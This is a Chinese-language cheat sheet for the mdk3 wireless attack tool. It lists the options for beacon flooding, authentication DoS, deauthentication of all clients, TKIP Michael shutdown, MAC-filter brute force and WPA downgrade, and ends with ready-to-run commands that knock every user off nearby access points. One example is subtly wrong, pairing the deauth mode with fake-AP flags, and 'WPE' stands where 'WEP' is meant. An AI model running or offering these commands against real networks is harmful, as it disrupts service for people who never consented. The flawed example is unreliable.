用法

1
mdk3 [interface] [mode] [options]

模式

b:伪造 AP

发射伪造的AP,可能造成网络扫描程序或者驱动程序崩溃

参数 说明
-n [ssid] 指定ssid,否则随机生产
-f [filename] 从文件中读取 SSID 列表
-v [filename] 从文件中读取 SSID 和 MAC 地址列表
-d 显示站点为点对点(Ad-Hoc)
-w 设置热点为 WEP 加密模式
-g 显示站点为 54 Mbit
-t 显示站点为 WPA TKIP 加密
-a 显示站点为 WPE AES 加密
-m 使用 OUI 数据库的有效 MAC 地址
-h 伪造则信道跳动,测试某些设备和驱动,但信道跳动会降低分组速率
-c [chan] 在此信道伪造 AP,如果你想让你的网卡跳到这个信道则必须设置 -h
-s [pps] 每秒发包速率,默认为50

a:身份验证 DoS

身份验证 DoS 攻击

参数 说明
-a [ap_mac] 只攻击指定 MAC 的 AP
-m 使用 OUI 数据库的有效 MAC 地址
-c 不检测是否成功
-i [ap_mac] 在AP 上智能测试,-a 和 -c 选项将忽略
-s [pps] 发包率,默认不限制

p:ESSID 穷举

基本侦测和ESSID穷举

参数 说明
-e [ssid] 指定 SSID
-f [filename] 从文件读取 SSID 并且 BF 算法匹配隐藏的 SSID(BF=Brute force)
-t [bssid] 设置目标 AP 的 MAC 地址
-s [pps] 发包率,默认无限制,BF 为 300
-b [character set] 字符集,使用完整的 BF 模式(建议仅使用Short SSIDs)制

d:掉线攻击

解除认证,强迫连接 AP 的每台设备掉线

参数 说明
-w [filename] 白名单 MAC 地址文件,免受攻击
-b [filename] 黑名单 MAC 地址文件,攻击对象
-s [pps] 发包率,默认不限制
-c [chan,chan,chan,…] 信道跳动,每5秒一次

m:取消流量

Michael shutdown,连续取消所有流量

参数 说明
-t [bssid] 设置目标 AP 的 MAC 地址
-w [seconds] 每次爆破间隔时间,默认10秒
-n [ppb] 每次爆破发送包,默认70
-j 使用新的 TKIP Qos-Exploit,仅需要几个包就可以关闭 AP
-s [pps] 发包率,默认400

w:扰乱路由表

WIDS / WIPS / WDS 多认证搅乱路由表

参数 说明
-e [ssid] AP SSID
-c [chan,chan,chan…] 信道
-z [ppb] 激活 Zero_Chaos’WIDS 开发

f:MAC 暴力破解

MAC 地址过滤暴力破解。对已知的客户端 MAC 地址尝试在动态变化时对给定 AP 进行身份验证

参数 说明
-t [bssid] BSSID
-m [mac] 设置 MAC 地址使用范围(3 bytes,i.e. 00:12:34)没有 -m 选项将使用内部数据库
-f [mac] 设置 MAC 地址的开始,-f 和 -m 不能同时使用

g:WPA 降级测试

WPA 降级测试,不验证站点和 AP 发送 WPA 加密的数据包,尝试设置为 WPE 加密或者不加密,mdk3 会让 WPE 或者未加密的客户端工作

参数 说明
-t [bssid] BSSID

例子

1
2
3
4
5
6
7
8
9
10
#开始监听无线网卡
airmon-ng start wlan0
#扫描APxinxi
airodump-ng mon0
#发射伪造AP
mdk3 mon0 d -n test_mdk3 -a -m -c 11
#身份验证攻击
mdk3 mon0 a -a D4:A1:48:EB:75:B4
#踢出链接附近AP的所有人
mdk3 mon0 d -s 1000 -c 11